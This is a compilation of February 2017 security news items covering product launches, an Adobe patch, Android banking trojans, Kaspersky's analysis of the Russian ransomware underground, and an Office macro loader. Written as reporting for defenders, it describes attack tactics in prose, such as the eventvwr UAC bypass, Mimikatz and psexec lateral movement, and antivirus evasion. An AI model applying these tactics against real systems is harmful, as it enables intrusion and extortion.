According to Qualys, security administrators will benefit from multiple enhancements that FIM and IOC bring to the Cloud Agent and cloud-based processing platform, including easy setup and no maintenance needs (modules can be instantly activated), minimal impact on performance (the Cloud Agent monitors file changes and system activity locally but sends all data to the Cloud Platform), unified security posture (FIM and IOC alert data is presented in a single, integrated view), and integration with AssetView (providing dynamic dashboards, interactive and saved searches, and visual widgets to analysts).
“Breaches continue to rise despite the investments in traditional mechanisms that organizations have deployed to support their businesses in the new era of digital transformation. Our new disruptive services for FIM and IOC extend the capabilities of our Cloud Agent platform, allowing companies to get the visibility and prevention they need against cyber threats from one single platform, drastically reducing their security costs,” Philippe Courtot, chairman and CEO, Qualys, said.
Expanded web application security offerings
With the release of Qualys Web Application Scanning (WAS) 5.0 and Web Application Firewall (WAF) 2.0 this week, the company added new functionality to its web application security offerings, in an attempt to provide customers with scalable fast scanning, detection and patching of websites, mobile applications and Application Programming Interfaces (APIs), in one unified platform.
The newly released WAS 5.0 offers not only programmatic scanning of Simple Object Access Protocol (SOAP) APIs, but also the testing of REpresentational State Transfer (REST) API services, Qualys announced. Moreover, it delivers scanning of IoT (Internet of Things) services and mobile apps, as well as API-based business-to-business connectors, and can automatically load-balance scanning of multiple applications across a pool of scanner appliances for efficiency. Moreover, improvements made to Progressive Scanning allow customers to scan very large sites, one slice at a time, to cover large applications that are problematic to scan in a short window.
WAF 2.0, on the other hand, offers one-click virtual patching feature to address both false-positives and the inability to quickly patch vulnerabilities; out-of-the-box security templates for popular platforms such as Wordpress, Joomla, Drupal and Outlook Web Application; and support for VMWare, Hyper-V, and Amazon Web Services, along with features such as load-balancing of web servers, health checks for business-critical web applications, custom security rules based on HTTP request attributes, reusable Secure Socket Layer profiles, detailed event log information, and centralized management.
Both Qualys WAS 5.0 and WAF 2.0 are available now as annual subscriptions. Pricng for Qualys WAS starts at $1,695 for small businesses and $2,495 for larger enterprises, while pricing for the WAF soluton starts at $1,995 for small businesses and $9,995 for larger enterprises.
Vulnerability data sharing
In addition to the expanded portfolio, Qualys also announced a partnership with crowdsourced security testing company Bugcrowd to allow joint customers to share vulnerability data across automated web application scanning and crowdsourced bug bounty programs.
The joint integration between Bugcrowd Crowdcontrol and Qualys Cloud Platform brings together automated web application scanning (WAS) and penetration-testing crowd in a single solution. Thus, joint customers should be able to eliminate vulnerabilities discovered by Qualys WAS from their list of offered bug bounties, while focusing on Bugcrowd programs and critical vulnerabilities that require manual testing.
The initial stage in this collaboration allows Bugcrowd customers who also have Qualys WAS to import vulnerability data into the Bugcrowd Crowdcontrol platform and use it to optimize their bug bounty program scope and incentives. In the future, joint customers running a bug bounty platform on Bugcrowd will be able to import unique vulnerabilities from Crowdcontrol into Qualys WAS and apply one-click patches through the fully integrated Qualys Web Application Firewall.
“With the move of IT to the cloud and all the digital transformation efforts underway, web apps are exploding and securing these apps is now front and center. By combining the automation of Qualys Web Application Scanning (WAS) and Bugcrowd's crowd sourcing platform, organizations can now cover a much larger number of applications and secure them more effectively at a lower cost,” Sumedh Thakar, Chief Product Officer, Qualys, said.
Senators Launch Query on Trump's Smartphone Security
14.2.2017 securityweek Mobil
Washington - Two US senators have requested details on President Donald Trump's smartphone security, saying he could jeopardize national secrets if he is still using his old handset, as some reports say.
"Did Trump receive a secured, encrypted smartphone for his personal use on or before Jan. 20? If so, is he using it?," said a tweet Tuesday by Senator Tom Carper, who along with fellow Democrat Claire McCaskill released a letter to the administration requesting information on the president's device.
"Trump should be well aware by now of the appropriate and necessary protocol to safeguard our nation's secrets."
The letter from the two lawmakers, dated February 9, was sent to Defense Secretary James Mattis along with Homeland Security chief John Kelly and the National Security Agency director Michael Rogers. The senators released the letter late Monday.
The lawmakers said they were concerned by reports that Trump was still using an Android device that may be several years old for his frequent personal Twitter messages.
"While it is important for the president to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records," the letter said.
"The national security risks of compromising a smartphone used by a senior government official, such as the president of the United States, are considerable."
The New York Times reported last month that while Trump had received a new, secure device after his inauguration, he still relied on his older device despite protests from aides.
That report prompted a flurry of comments from security experts who argued that the president would be inviting danger by using his old personal phone.
Trump's smartphone "would probably be the most widely prized device on the internet for hackers -- and top of the target list for intelligence agencies around the world," said independent security researcher Graham Cluley in a blog post Tuesday.
Last month, Nicholas Weaver of the International Computer Science Institute in Berkeley, California, warned that "Trump's continued use of a dangerously insecure, out-of-date Android device should cause real panic."
Writing on the Lawfare blog, Weaver noted that hackers could gain access to the phone's location as well as its microphone and camera and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services and is actively being exploited."
Over a Dozen Code Execution Flaws Patched in Flash Player
14.2.2017 securityweek Vulnerebility
Adobe on Tuesday released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions and the Campaigns marketing tool, but none of the flaws have been exploited in the wild.
Flash Player 24.0.0.221 patches 13 critical vulnerabilities that can be exploited for arbitrary code execution, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.
The security holes were reported to Adobe by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.
In the Digital Editions ebook reader Adobe fixed nine flaws with the release of version 4.5.4 for Windows, Mac and Android. The patched vulnerabilities include a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.
A majority of the flaws were reported to Adobe by Steven Seeley of Source Incite, but the critical issue was identified by Ke Liu of Tencent's Xuanwu LAB.
With the release of Adobe Campaign 6.11 for Windows and Linux, the vendor patched a moderate severity security bypass flaw affecting the client console. The weakness allows an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.
A second flaw addressed in the latest version of Campaign is a moderate severity input validation bug that can be exploited for cross-site scripting (XSS) attacks. The vulnerabilities were reported to Adobe by researcher Léa Nuel.
Senators want more info on Trump’s personal phone and its defense
14.2.2017 securityaffairs Mobil
Two US senators want detailed info on Trump’s personal phone and the way the Defense Information Systems Agency (DISA) will protect it.
Recently security experts warned of the risk of cyber attacks on Trump’s personal phone that may be open to hackers.The news of Trump’s use of an Android smartphone was first reported by The New York Times.
The American President Trump is still using his personal insecure Android smartphone and at the end of January, the researcher who goes online with moniker @WauchulaGhost reported his Twitter account is exposed to the risk of hack due to security misconfigurations.
The official @POTUS Twitter account was linked to a private Gmail account owned by President Trump.
News of the day is that two senators have written to the U.S. Department of Defense requesting more info about the fact that President Donald Trump may still be using an unsecured Android phone.
“We write today regarding the security concerns stemming from President Donald Trump’s reported use of his personal, unofficial, smartphone. Public reports originally indicated that President Trump began using a “secure, encrypted device approved by the U.S. Secret Service” prior to taking office. Subsequent reports, however, suggest that President Trump may still be using his personal smartphone, an “old, unsecured Android phone.“” reads the letter sent by Tom Carper, a Democrat from Delaware, and Claire McCaskill, a Democrat from Missouri.
“While it is important for the President to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records,”
Senators fear that nation-state actors could hack into the Trump’s personal phone and could access sensitive information.
“These reports are very troubling because security risks associated with the use of an unsecured phone include hackers’ ability to access the device to turn on audio recording and camera features, as well as engaging surveillance tools that allow location and other information tracking features” continues the letter.
Attackers can exploit security flaws in Trump’s personal phone to spy on its communication, for this reason, the national security agencies discourage the use of personal mobile devices.
“DoD policies, operational constructs, and security vulnerabilities currently prevent the adoption of devices that are unapproved and procured outside of official government acquisition.” reads the Department of Defense’s 2013 Commercial Mobile Device Implementation Plan cited by the senators in the letter.
The senators’ request for a written response on what kind of device President Trump is using for its communication, they desire to have more information about the initiative of the Defense Information Systems Agency (DISA) to protect Presidential communications.
They want to know if the DoD agency has written specific policies and procedures to mitigate the risks related to the use of the Trump’s personal phone.
V Česku se přes SMS šíří nebezpečný malware
14.2.2017 SecurityWorld Viry
První případy nové vlny útoků na banky v Česku a Slovensku prostřednictvím mobilního bankovnictví zachytili analytici Esetu. Kyberútočníci použili malware pro Android, který lokalizovali na tuzemské uživatele a k jeho šíření využili klasické SMS zprávy.
Na Česko cílí nová vlna malware, který se šíří podvodnými zprávami SMS. Podle aktuálních informací se útočníci prozatím zaměřili jen na ČSOB. Dá se však očekávat, že okruh cílových bank se brzy rozšíří, tvrdí Lukáš Štefanko z Esetu.
Škodlivý kód typu trojan pro platformu Android je novou variantou již známé rodiny malware, která se v závěru ledna šířila prostřednictvím falešných SMS zpráv, předstírajících komunikaci České pošty nebo obchodu Alza.cz.
Malware Android\Trojan.Spy.Banker.HV uživateli při otevření internetového bankovnictví podsune falešnou přihlašovací stránku. Nepozorný uživatel tak nevědomky odešle své přihlašovací údaje podvodníkům a vystaví se hrozbě vykradení účtu.
V aktuální útočné kampani, která probíhá v Česku a na Slovensku, je tento nebezpečný malware šíří pomocí SMS s odkazem na údajnou aplikaci společnosti DHL, která však stáhne podvodnou aplikaci s názvem „Flash Player 10 Update“ a ikonou společnosti DHL.
Přestože název aplikace útočníci změnili, ikonu zatím nikoli, což při instalaci v českém nebo slovenském prostředí působí podezřele.
Experts warn of the rapid growth of the Marcher Android banking Trojan
14.2.2017 securityaffairs Android
Malware researchers at the security firm Securify have published a detailed analysis of the Marcher Android banking Trojan.
Security experts at the Securify have published a detailed analysis of the Marcher Android banking Trojan, a threat that has been around since late 2013. First variants of the malware were developed to trick users into handing over their payment card details using Google Play phishing pages. On March 2014, Marcher was observed targeting bank customers in Germany.
In the second half of 2016, the threat targeted dozens of organizations in various countries, including U.S., U.K., Australia, France, Poland, Turkey, and Spain.
The malicious code has been disguised as various popular apps, including WhatsApp and Netflix.
Early 2017, security experts at Zscaler have spotted a strain of the Android Marcher Trojan masqueraded as the recently released Super Mario Run mobile game for Apple’s iOS.
Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.
“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” states the analysis published by Zscaler.
Researchers at Securify have detected nine Marcher botnets over the last 6 months, the threat actors leverage web injects to target a large number of different apps.
The vast majority of bots were located in Germany (51%), followed by France (20%), and UK (7%).
“Based on statistics of the backend we know that their campaign has successfully infected 5696 German and 2198 French mobile devices over total of 11049 affected mobile devices.” reads the analysis published by Securify. “While assessing their C2 server, we found that most infected devices are running Android 6.0.1. The C2 server at the time of investigation contained at least 1300 credit card numbers and other bank information (username/password + SMS tan). “
The Marcher malware is able to check foreground apps, when a targeted app is executed the malicious code uses an overlay screen to trick victims into handing over sensitive information, such as login credentials and credit card data.
“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.
The malware also implements a simple as effective antivirus evasion technique, it maintains a list of most popular antivirus solutions for which it prevents the removal. Marcher monitors for any AV app in the list and if it is running, it will force the mobile device back to the home screen. Even the AV program detects the Marcher malware, it will still wait and ask for permission from users before removing it, but because the user can’t give the permission, the malware will not be deleted.
The “solid organization” behind the Marcher Trojan makes the threat very dangerous, experts consider it effective like other notorious banking malware like Sinowal/Torpig, Dyre, Dridex, and Gozi.
“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” concluded the experts.
A look into the Russian-speaking ransomware ecosystem
14.2.2017 Kaspersky Virus
It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.
Kaspersky Lab statistics on the ransomware threat in 2016
In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.
So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:
It’s easy to buy a ransomware build or builder on the underground market
It’s easy to buy a distribution service
Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies
In other words, this is a fine tuned, user friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we’ve learned.
1. In most cases crypto ransomware has a Russian origin
One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.
Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.
But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.
2. There are three types of involvement in the ransomware “business”
The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.
Create new ransomware for sale
Become a partner in a ransomware affiliate program
Become the owner of an affiliate program
The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.
An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.
Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.
The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals’ choice; and which will request administrator privileges until it receives it. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.
The interface of the Glove ransomware builder
Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.
Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.
An advertisement offering unique crypto ransomware with a pay-per-build model
The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.
An example of a command and control panel which comes with the build of a certain ransomware family
Affiliate programs, the third type of involvement in the ransomware criminal business, is a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and couple of bitcoins as a partnership fee.
An advertisement for an affiliate program
Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.
Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.
To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.
3. There are some really big players on this market
If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.
The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise
There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.
4. Costs and profits on the underground ransomware market are high
We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.
The structure of the operating cost of a large ransomware group more or less looks like the following:
Ransomware modules update
New features
Bypass techniques
Encryption improvement
Distribution (spam/exploit kits)
AV check service
Credentials for hacked servers
Salary for hired professionals (usually these are IT administrators who support the server infrastructure)
The core of the whole group’s mechanics is ransomware code and the distribution channels.
They distribute ransomware in four main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and could cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.
Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.
And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.
How criminals use one infected organization to attack another
It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company’s contact list. It is hard to underestimate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods used by cybercriminals use to distribute malware, there is no way for him/ her to identify the attack.
As we’ve learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we’ve seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let’s go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.
The typical distribution of profit (green) vs. operating costs (red) in a ransomware business
That’s of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we’ve seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000 dollars.
5. Professional ransomware groups are shifting to targeted attacks
An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.
The mechanics of these new attacks are very different to what we’ve been used to seeing.
For initial infection they have not used exploit packs, or spear phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
To get into the organization’s network, this group used open source exploits and tools
If the organization had an unprotected server with RDP access this group tried to use brute force against it
To get the necessary access rights to install ransomware in the network with psexec they used a Mimikatz tool.
Then they could establish persistence using an open sourced RAT tool called PUPY
Once they had gained a foothold in the attacked network, they studied it, choose the most important files and encrypted them with a custom, yet unseen, build of ransomware.
Another group which we have found in another large organization did not use any ransomware at all. They encrypted data manually. To do this they choose important files on a server and move it into a password protected archive.
Conclusion
In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.
1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.
2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.
We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.
It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.
Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.
This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.
Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.
Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.
And the main advice – DO NOT PAY! If you pay the ransom, you money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they get access to, giving them access to much broader attack opportunities.
ThreatConnect Launches New Threat Intelligence Products
14.2.2017 securityweek Security
Threat intelligence firm ThreatConnect announced this week the launch of a new suite of products designed to help organizations understand adversaries, automate their security operations, and accelerate threat mitigation.
The new products, built on the ThreatConnect Platform, have been named TC Complete, TC Analyze, TC Manage and TC Identify.
TC Complete, the company’s flagship product, is a security operations and analytics platform that aims to enable companies to efficiently run their security operation center (SOC) by giving them the ability to orchestrate security processes, analyze data, respond to threats, and report progress from a single location. TC Complete incorporates the features and benefits of all the other ThreatConnect products.
Another new product is TC Identity, which provides vetted threat intelligence collected from over 100 open source feeds, ThreatConnect communities, the company’s research team and, optionally, intelligence from members of the TC Exchange program.
TC Manage is an intelligence-driven orchestration tool that enables organizations to automate threat data management processes, including notifying team members when manual tasks need to be performed, or sending indicators to defensive tools for blocking or alerting.
The last new product is the TC Analyze threat intelligence platform, which provides a central location for analyzing data and integrating with existing security tools. The platform allows analysts to better understand which threats are relevant, gain visibility into attack patterns, and share threat intelligence with executives and other stakeholders.
“By introducing our new innovative suite of products, we are able to address all levels of need in the marketplace. With these four specific products, ThreatConnect allows any organization with any size security team the option to extend its capabilities,” said ThreatConnect VP of Product Andy Pendergast. “We conducted substantial research into organizations’ current and potential intelligence needs to protect their environment and came up with these specific products to reach them where they are now and where they need to be in the future.”
Office Loader leverages malicious macros to deliver multiple malware
14.2.2017 securityaffairs Virus
Security researchers at Palo Alto Networks spotted a campaign leveraging Microsoft Office loader using malicious macros to drop multiple malware families.
The researchers analyzed more than 650 unique samples of this specific loader since early December 2016, accounting for 12,000 phishing email targeting numerous industries.
Most affected industries are High Tech, Professional and Legal Services, and Government.
The Office loader is being delivered via spam messages and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to infected the target.
“The loader itself is primarily delivered via email and makes use of heavily obfuscated malicious macros as well as a user account control (UAC) bypass technique that was originally discovered in August 2016.” reads the analysis published PaloAlto Networks.
The phishing messages used several malicious documents masqueraded as invoices, product lists, deposit slips, or document scans, and more.
The Office loader was used to drop several malware such as LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” continues the analysis.
According to the experts, threat actor behind the campaign may have used a builder to generate the malicious macros that have been obfuscated with a large amount of garbage code and randomly chosen variables. The second part of the malicious macro includes also obfuscated strings and a number of strings written to the Word document.
The first half of the macro includes a function to decode the obfuscated strings.
“In the second half of the macro, we see a garbage code, a number of obfuscated strings, as well as a number of strings that are written to the Word document. These strings are in-line with the ploy being used by the attacker based on the witnessed subject line and filename.” reads the analysis.
“This function will download a file via PowerShell and drop it within the %TEMP% directory. It then sets a specific registry key to point to this newly dropped file. Finally, it will execute the built-in eventvwr.exe process, sleep for roughly 15 seconds by performing a ping against the localhost 15 times, and removes the executes the dropped file. The registry key write and execution of eventvwr.exe is a UAC bypass technique that was first discussed here. “
The experts noticed that a small number of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware.
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns.” concluded PaloAlto Networks. “It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.”
IaaS Creating New Variant of Shadow IT
13.2.2017 securityweek Crime
Custom Applications are being Increasingly Used from Within Public Clouds as Part of the Migration to IaaS
Organizations cannot rely on commercial off-the-shelf (COTS) software to fulfil all their IT requirements: almost all companies develop their own custom apps. The majority of these apps, whether internal or internet-facing, currently run on datacenters owned or operated locally. By the end of 2017 this will change -- the majority of enterprise custom apps will reside in public clouds as the industry-wide migration to Infrastructure as a Service (IaaS) increases speed.
A new report, conceived and developed by the Cloud Security Alliance and Skyhigh Networks, polled 314 qualified respondents in December 2016 and January 2017. The results (PDF) show that an increasing number of custom apps are being moved into cloud infrastructures (primarily AWS, Azure and Google Cloud Platform) without the security team necessarily being aware that they exist. This is effectively a new variant of Shadow IT -- it is not necessarily software unknown to the IT department, but it is software unknown to the head of security.
This presents a new security and compliance challenge since CISOs cannot secure what they cannot see. It is possible that the app developers assume that their apps are protected by the cloud providers' security, and therefore don't need to be sanctioned by in-house security. Certainly, the majority of respondents believe that IaaS is more secure than local data centers simply because of the huge security resources available to Amazon, Microsoft and Google.
But clouds operate a form of shared responsibility under which the customer is responsible for the data it uploads and the apps it develops. The report cites the example of Code Spaces, which provided a code repository for its customers on AWS. It was breached. AWS was not compromised, but rather the attackers got hold of a legitimate Code Spaces account password. Ultimately, they destroyed all the customers' data, and the effect on Code Spaces was so severe that it went out of business.
What the Skyhigh survey highlights is that more and more custom apps are being used from within public clouds as part of the migration to IaaS.
"The security of custom applications has not been a focus in many organizations," explains Nigel Hawthorn, Skyhigh's chief European spokesperson, "but every company is now a software company; 92 percent of them write their own custom apps, and the average enterprise will have more than 500 apps running in the next year. Moreover, 72% of companies have a bespoke critical app running today that is essential to operations. When these workloads are targeted by a cyberattack or fall victim to a mistake, the downtime will cost a business dearly. It's no surprise that application innovation is ahead of security but, with an average of 285 custom apps running that are unknown to IT security teams, companies must ensure that IT security is part of the custom app development process."
The actual number of apps unknown to security varies with the size of the organization. Small companies, with less than 1,000 employees, can have as few as 22 custom apps; but large companies with more than 50,000 employees can have an average of 788 apps. It is the invisibility of such a large number of them that causes the security concern. Sixty-five percent of respondents said they are moderately or very concerned for the security of custom apps in the cloud, with only 13.8% 'not at all concerned'.
"IT security professionals," says the report, "are only aware of 38.4% of the applications known to IT administrators. This means that IT security teams are involved in fewer than half of these applications to ensure corporate data is protected against threats. Rather than security being a barrier to development, it appears development is occurring without involvement from security."
The biggest single concern (from 66.5% of respondents) is that unprotected apps could be used to upload sensitive data to the cloud. This is followed at 56% by a third-party account compromise similar to the one suffered by Code Spaces. But 40.1% are also concerned about sensitive data being downloaded from the cloud to an unmanaged BYOD device.
Loss of personal data could be expensive under data protection regulations and damaging to brand reputation; but some of the custom apps are actually critical to business operations. Almost 73% of the respondents said they have at least one business-critical application. Forty-six percent of these are either fully deployed in the public cloud or in a hybrid public/private cloud -- and IT security professionals have incomplete visibility into their deployment and operations. As the migration to IaaS continues, the number of business-critical custom apps at risk will undoubtedly increase.
"Securing sensitive data in the cloud is no longer the remit of one party, it's a shared responsibility," says Hawthorn. "The rapid adoption of IaaS deployments sees the role split between infrastructure providers and enterprises, while internally, businesses cannot expect IT to manage cloud security alone. There needs to be buy-in from all departments to ensure custom applications have cybersecurity imbedded from the start, and that employees continue to use them in ways that won't put corporate data at risk."
Last week, Skyhigh Networks SVP of products and marketing, Kamal Shah, announced in a blog post, "Skyhigh will pioneer this next phase of the cloud security market with Skyhigh for Custom Apps and Skyhigh for Amazon Web Services, Microsoft Azure, and Google Cloud Platform.
RSA Unveils Business-Driven Security Offering
13.2.2017 securityweek Security
RSA, which since September is part of Dell Technologies, on Monday unveiled a new approach and product improvements designed to help organizations manage cyber risk.
With its new Business-Driven Security architecture, RSA aims to provide organizations the tools needed to link security information to business context and protect the most sensitive assets.
The RSA Business-Driven Security solutions focus on threat detection and response, consumer fraud protection, identity and access assurance, and business risk management.
This includes the RSA NetWitness Suite, which provides visibility and actionable insight for detecting advanced threats and understanding the full scope of an incident. The new capabilities added to the product enable organizations to monitor any infrastructure by collecting data from public clouds (e.g. AWS, Microsoft Azure), virtual environments, and physical infrastructure.RSA launches new solution
The launch of Business-Driven Security also brings improvements to RSA SecurID Access. RSA says the multi-factor authentication and access management product now offers a better way for delivering strong security to users, devices and applications.
The latest release of the RSA Fraud & Risk Intelligence Suite brings a centralized platform designed to improve fraud detection and investigation. The new platform should enable organizations to better protect their customers against cyberattacks by allowing them to obtain additional insights, including from internal and external sources, and other anti-fraud tools.
The offering also includes the RSA Archer Ignition Program, which helps organizations manage business risk through a combination of Governance Risk and Compliance (GRC) use cases, quick launch services and education offerings.
